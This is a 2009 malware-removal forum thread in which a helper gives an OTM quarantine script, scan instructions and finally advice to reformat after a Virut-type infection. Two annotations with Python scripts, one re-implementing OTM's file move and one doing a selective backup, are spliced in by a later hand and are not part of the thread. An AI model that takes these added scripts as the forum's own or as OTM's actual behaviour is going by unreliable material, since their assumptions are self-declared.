Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby Dakeyras » August 7th, 2009, 5:15 am

hn2009 wrote:Hey,

Please go ahead and provide a script to remove the softwares in question.

Thanks,
Harsh
A wise decision :thumbup: I am unavailable for most of today but I will have the next course of action/instructions for your good self by this evening my time GMT.
Dakeyras
MRU Honors Graduate
Posts: 8804
Joined: November 21st, 2007, 5:30 am
Location: The Tundra

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby Dakeyras » August 7th, 2009, 2:38 pm

Hi :)

Flash Disinfector:

  • Please download Flash_Disinfector and save it to your desktop.
  • Double click to run it.
  • You will be prompted to plug in your USB Hard Drive. Plug it in.
  • Flash_Disinfector will start disinfecting your flash and hard drives. This takes a few seconds. Your desktop will disappear in the meantime.
  • When done, a message box will appear. Click OK. Your desktop should now appear. If it doesn't, press Ctrl + Shift + Esc to open Task Manager.
  • Click on File > New Task (Run...). Type in explorer.exe and press Enter. Your desktop should now appear.

Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.

Leave your USB Hard Drive connected.

Next:

  • Double-click OTM to start the program.
  • Copy the lines from the codebox to the clipboard by highlighting ALL of them and pressing CTRL + C (or, after highlighting, right-click and choose Copy):
Code:
:Files
H:\backup\Velocity Media\Website v2\about.html
H:\backup\Velocity Media\Website v2\bottom.html
H:\backup\Velocity Media\Website v2\contact.html
H:\backup\Velocity Media\Website v2\corpevents.html
H:\backup\Velocity Media\Website v2\creative.html
H:\backup\Velocity Media\Website v2\events.html
H:\backup\Velocity Media\Website v2\gallery.html
H:\backup\Velocity Media\Website v2\gallery2.html
H:\backup\Velocity Media\Website v2\marcom.html
H:\backup\Velocity Media\Website v2\marketing.html
H:\backup\Velocity Media\Website v2\menu.html
H:\backup\Velocity Media\Website v2\menu.js
H:\backup\Velocity Media\Website v2\pbrowser_dom.js
H:\backup\Velocity Media\Website v2\pbrowser_ie.js
H:\backup\Velocity Media\Website v2\pbrowser_iemac.js
H:\backup\Velocity Media\Website v2\pbrowser_opera.js
H:\backup\Velocity Media\Website v2\pbrowser_safari.js
H:\backup\Velocity Media\Website v2\portfolio.html
H:\backup\Velocity Media\Website v2\pr.html
H:\backup\Velocity Media\Website v2\services.html
H:\backup\Velocity Media\Website v2\swfobject.js
H:\backup\Velocity Media\Website v2\thankyou.html
H:\backup\Velocity Media\Website v2\top.html
H:\backup\Velocity Media\Website v2\validation1.js
H:\backup\Velocity Media\Website v2\vmenu1.js
H:\backup\Velocity Media\Website v2\_holding.htm
H:\Data Sorting\Work\Quantum\MSNChecker.exe
H:\Data Sorting\Work\Quantum\msnchecker1.1.exe
H:\backup\Velocity Media\Website v3\archive\gallery.html
H:\backup\Velocity Media\Website v3\archive\swfobject.js
H:\backup\Velocity Media\Website v3\archive\validation1.js
H:\backup\Velocity Media\Web Design\Vector Graphics\645 Vector Design Elements.exe
H:\Downloads\Vector Softwares\CorelDraw X4 inc Keygen0I\CorelDRAWGraphicsSuiteX4Installer_EN.exe
H:\backup\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine\09CC0002\4BCE6382.VBN
H:\backup\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine\09CC0001\4BFDF086.VBN
H:\backup\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine\09CC0000\4BFDED76.VBN
H:\backup\Documents and Settings\me\My Documents\Azureus Downloads\CorelDraw X4 inc Keygen0I\CorelDRAWGraphicsSuiteX4Installer_EN.exe

:Commands
[EmptyTemp]
[Reboot]
  • Return to OTM, right-click in the "Paste instructions for items to be moved" window (under the yellow bar) and choose Paste
  • Then click the red MoveIt! button.
  • Copy everything in the Results window (under the green bar) to the clipboard by highlighting ALL of it and pressing CTRL + C (or, after highlighting, right-click and choose Copy), and paste it into your next response.
  • If OTM asks to reboot your computer, allow it to do so. The report should appear in Notepad after the reboot.
  • Close OTM.

Malwarebytes Anti-Malware:

  • Launch the application, Check for Updates >> Perform full Scan
  • When the scan is complete, click OK, then Show Results to view the results.
  • Be sure that everything is checked, and click Remove Selected.
  • When completed, a log will open in Notepad. please copy and paste the log into your next reply.

Note: If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts, click OK to either and let MBAM proceed with the disinfection process, if asked to restart the computer, please do so immediately. Failure to reboot will prevent MBAM from removing all the malware.

ESET Online Scanner:

Note: You can use either Internet Explorer or Mozilla FireFox for this scan.

  • Please go here then click on: Image
    Note: If using Mozilla Firefox you will need to download esetsmartinstaller_enu.exe when prompted then double click on it to install.
    All of the below instructions are compatible with either Internet Explorer or Mozilla FireFox.
  • Select the option YES, I accept the Terms of Use then click on: Image
  • When prompted allow the Add-On/Active X to install.
  • Make sure that the option Remove found threats is NOT checked, and the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
    • Scan for potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth Technology
  • Now click on: Image
  • The virus signature database... will begin to download. Be patient, this may take some time depending on the speed of your Internet Connection.
  • When completed the Online Scan will begin automatically.
  • Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
  • When completed select Uninstall application on close if you so wish, make sure you copy the logfile first!
  • Now click on: Image
  • Use notepad to open the logfile located at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
  • Copy and paste that log as a reply to this topic.

When completed the above, please post back the following in the order asked for:

  • How is your computer performing now, any other symptoms and or problems encountered?
  • OTM Log.
  • Malwarebytes Anti-Malware Log.
  • ESET Log.
  • A new HijackThis Log.
Dakeyras
MRU Honors Graduate
Posts: 8804
Joined: November 21st, 2007, 5:30 am
Location: The Tundra
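The OTM script in the post above does one thing worth understanding before you run it: every path under :Files is moved, not deleted, into a timestamped folder under the quarantine root, with the original path preserved beneath it, which is the layout visible earlier in the thread (C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\about.html). That is why the helper can later say the files are still in the OTM backup, and why moving them back would re-infect the machine. The script below is an added example that re-implements that move step in Python; it is not OTM's own code. Two details are my assumptions and differ from OTM: the drive letter is kept as the first folder under the timestamp so files from C: and H: cannot collide, and the log wording only imitates OTM's report. The [EmptyTemp] and [Reboot] commands are parsed and logged but not executed. The demo tree and files are constructed.

```python
"""Re-implementation of the OTM ':Files' move step, as an added example.

This is not OTM's code.  It parses a script in the shape posted above (a ':Files'
section of full paths, then a ':Commands' section), moves every listed file into a
timestamped quarantine folder and keeps the original path underneath it, which is
the layout the thread's OTM log shows (C:\\_OTM\\MovedFiles\\<stamp>\\...).  Two
choices are assumptions: the drive letter is kept as the first folder under the
stamp so files from C: and H: cannot collide, and the log wording only imitates OTM's.
"""
from datetime import datetime
from pathlib import Path, PureWindowsPath
import shutil
import tempfile


def parse_otm_script(text: str) -> dict:
    """Split an OTM script into {'Files': [...], 'Commands': [...]} by ':Section' line."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(":"):
            current = line[1:]
            sections[current] = []
        elif current is not None:
            sections[current].append(line)
    return sections


def quarantine_path(root, stamp: str, original: str) -> Path:
    """Map 'H:\\backup\\x.html' to <root>/<stamp>/H/backup/x.html (drive folder assumed)."""
    win = PureWindowsPath(original)          # also accepts '/' separated paths
    drive = win.drive.rstrip(":") or "_"
    return Path(root) / stamp / drive / Path(*win.parts[1:])


def move_files(script_text: str, root, stamp: str = None) -> list:
    """Move each ':Files' entry into the quarantine tree; return a list of log lines."""
    stamp = stamp or datetime.now().strftime("%m%d%Y_%H%M%S")
    sections = parse_otm_script(script_text)
    log = []
    for original in sections.get("Files", []):
        src = Path(original)
        if not src.is_file():
            log.append(f"File/Folder {original} not found.")
            continue
        dest = quarantine_path(root, stamp, original)
        dest.parent.mkdir(parents=True, exist_ok=True)
        shutil.move(str(src), str(dest))     # move, never delete: the copy stays restorable
        log.append(f"{original} moved successfully.")
    for cmd in sections.get("Commands", []):
        log.append(f"Command {cmd} noted.")  # [EmptyTemp]/[Reboot] are left to the caller
    return log


def run_demo() -> dict:
    """Build a throwaway tree with constructed files and quarantine one of them."""
    base = Path(tempfile.mkdtemp())
    site = base / "backup" / "Website v2"
    site.mkdir(parents=True)
    (site / "about.html").write_text("<html>about</html>")
    (site / "clean.html").write_text("<html>clean</html>")
    script = (f":Files\n{site / 'about.html'}\n{site / 'missing.js'}\n\n"
              ":Commands\n[EmptyTemp]\n[Reboot]\n")
    root = base / "_OTM" / "MovedFiles"
    log = move_files(script, root, stamp="08072009_143800")
    moved = quarantine_path(root, "08072009_143800", str(site / "about.html"))
    return {
        "log": log,
        "moved_exists": moved.is_file(),
        "source_gone": not (site / "about.html").exists(),
        "clean_kept": (site / "clean.html").is_file(),
    }


if __name__ == "__main__":
    for line in run_demo()["log"]:
        print(line)
```

Because the quarantine is a plain move, a file that was listed by mistake can be put back by reversing the path mapping; a file that was listed because it is infected must stay where it is, which is the point the helper made about the about.html copies.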

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby hn2009 » August 9th, 2009, 2:32 pm

Hi,

I was unable to perform the previous steps provided by you as my laptop just went downhill from there on and I had to format and restore it back to factory settings.

Now I have two desktops at home on which I connected my external Hard Disk Drive and scanned it using Bullguard software. I had a number of viruses which I cleaned by deleting all of them. However when I detached my Hard Drive and connected it back Bullguard again detected viruses and quarantined them. Now I do not know how to get rid of these viruses. The System Volume is affected by Win32.Virtob.Gen.12 & Gen.Trojan.Heur.GM.0000026180.

I am in deep trouble trying to clean up all the viruses and my work is badly affected because of this (3 days of unproductivity). I sincerely request you to help me at the earliest.

Regards,
Harsh
hn2009
Active Member
Posts: 12
Joined: July 22nd, 2009, 4:59 am

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby Dakeyras » August 9th, 2009, 3:43 pm

Hi :)

I was unable to perform the previous steps provided by you as my laptop just went downhill from there on and I had to format and restore it back to factory settings.
If I understand correctly this was the machine we were working on, if so fair play and thank you for informing myself.

Now I have two desktops at home on which I connected my external Hard Disk Drive and scanned it using Bullguard software. I had a number of viruses which I cleaned by deleting all of them. However when I detached my Hard Drive and connected it back Bullguard again detected viruses and quarantined them. Now I do not know how to get rid of these viruses. The System Volume is affected by Win32.Virtob.Gen.12 & Gen.Trojan.Heur.GM.0000026180.
This is not good news at all I'm afraid one of the infections is a variation of a polymorphic, memory-resident file-infector.

I am in deep trouble trying to clean up all the viruses and my work is badly affected because of this (3 days of unproductivity). I sincerely request you to help me at the earliest.
These are business-related machines; even though this forum and I myself have a policy about not providing assistance for such, it is all a moot point.

Next

One or more of the identified infections is a severe Polymorphic File Infector

This allows hackers to remotely control your computer, steal critical system information and Download and Execute files.

I would counsel you to disconnect this PC from the Internet immediately. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable, and it would be wise to contact those same financial institutions to apprise them of your situation.

Unfortunately no attempt could be made to clean this machine, it could never be considered to be truly clean, secure, or trustworthy. We could not say definitively that unknown and unseen malware will have been removed, nor will your system be restored to its pre-infection state. We cannot remedy unknown changes the malware may likely have made in order to allow itself access, nor can we repair the damage it may possibly have caused to vital system files. Additionally, it is quite possible that changes made to the system by the malware may impact negatively on your computer during the removal process. In short, your system may never regain its former stability or its full functionality without a reformat. Therefore, your best and only course of action is a reformat and reinstallation of the Windows operating system, and that is the course we strongly recommend.

I also recommend you format the external Hard-Drive and if you use a Router, reset it and apply a new Admin' password.

Please read these for more information:

Virut and other Other File Infectors

How Do I Handle Possible Identity Theft, Internet Fraud and CC Fraud?

When Should I Format, How Should I Reinstall

Next:

I suggest you start backing up all of your valuable data/documents/pictures/movies/songs/etc..
Do NOT backup any applications/installers and Do NOT backup any .exe/.scr/.htm/.html/.xml/.zip/.rar files...
This is because these files may be infected as well. If you back them up and replace them afterwards, it will infect your computer again.

Should you have any questions, please feel free to ask.
Dakeyras
MRU Honors Graduate
Posts: 8804
Joined: November 21st, 2007, 5:30 am
Location: The Tundra
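The backup rule just given (carry over data, but no applications or installers and nothing ending in .exe/.scr/.htm/.html/.xml/.zip/.rar) is easy to get wrong by hand on an external drive holding thousands of files, and a single missed executable defeats the reformat. The script below is an added example, not from the thread: it copies a data tree to a destination, refuses exactly the extension list above, and returns a report of what was copied and what was left behind so the skipped list can be reviewed before the drive is formatted. Two extra rules are my own assumptions beyond the helper's list: anything named autorun.inf is skipped (the autorun vector that Flash Disinfector guards against earlier in the thread), and a risky extension hidden behind another one ("photo.jpg.exe") still counts. The demo files are constructed.

```python
"""Selective backup that refuses the file types the helper says not to carry over.

Added example, not from the thread.  It copies a data tree to a destination while
skipping .exe/.scr/.htm/.html/.xml/.zip/.rar files (the list given above) and returns
a report of what was copied and what was left behind.  Two extra rules are my own
assumptions: anything named autorun.inf is skipped, and a risky extension hidden
behind another one ("photo.jpg.exe") still counts.
"""
from pathlib import Path
import shutil
import tempfile

RISKY_SUFFIXES = {".exe", ".scr", ".htm", ".html", ".xml", ".zip", ".rar"}


def is_risky(path) -> bool:
    """True if the file must not be copied to the backup."""
    path = Path(path)
    if path.name.lower() == "autorun.inf":
        return True
    # 'photo.jpg.exe' has suffixes ['.jpg', '.exe']; any risky piece disqualifies the file.
    return any(s.lower() in RISKY_SUFFIXES for s in path.suffixes)


def backup_tree(src, dst) -> dict:
    """Copy every non-risky file under src to the same relative path under dst."""
    src, dst = Path(src), Path(dst)
    copied, skipped = [], []
    for p in src.rglob("*"):
        if not p.is_file():
            continue
        rel = p.relative_to(src).as_posix()
        if is_risky(p):
            skipped.append(rel)
            continue
        target = dst / p.relative_to(src)
        target.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(p, target)            # copy, never move: the source stays intact
        copied.append(rel)
    return {"copied": sorted(copied), "skipped": sorted(skipped)}


def run_demo() -> dict:
    """Build a throwaway tree with constructed files and back it up."""
    base = Path(tempfile.mkdtemp())
    src, dst = base / "H", base / "backup_clean"
    (src / "docs").mkdir(parents=True)
    (src / "docs" / "notes.txt").write_text("notes")
    (src / "docs" / "report.docx").write_text("report")
    (src / "docs" / "photo.jpg.exe").write_bytes(b"MZ")
    (src / "Website v2").mkdir()
    (src / "Website v2" / "about.html").write_text("<html>")
    (src / "autorun.inf").write_text("[autorun]")
    return backup_tree(src, dst)


if __name__ == "__main__":
    report = run_demo()
    print("copied :", report["copied"])
    print("skipped:", report["skipped"])
```

The skipped list is the output to read: a document you genuinely need that ends in .zip or .html has to be re-created from a trusted source, not restored, because with a file infector like the one named in this post there is no way to tell a clean copy from a patched one by name alone.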

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby NonSuch » August 13th, 2009, 2:12 am

As the resolution of this issue requires a reformat, and there have been no questions posted regarding that process, this topic is now closed.

You can help support this site from this link:
Donations For Malware Removal
NonSuch
Administrator
Posts: 28747
Joined: February 23rd, 2005, 7:08 am
Location: California
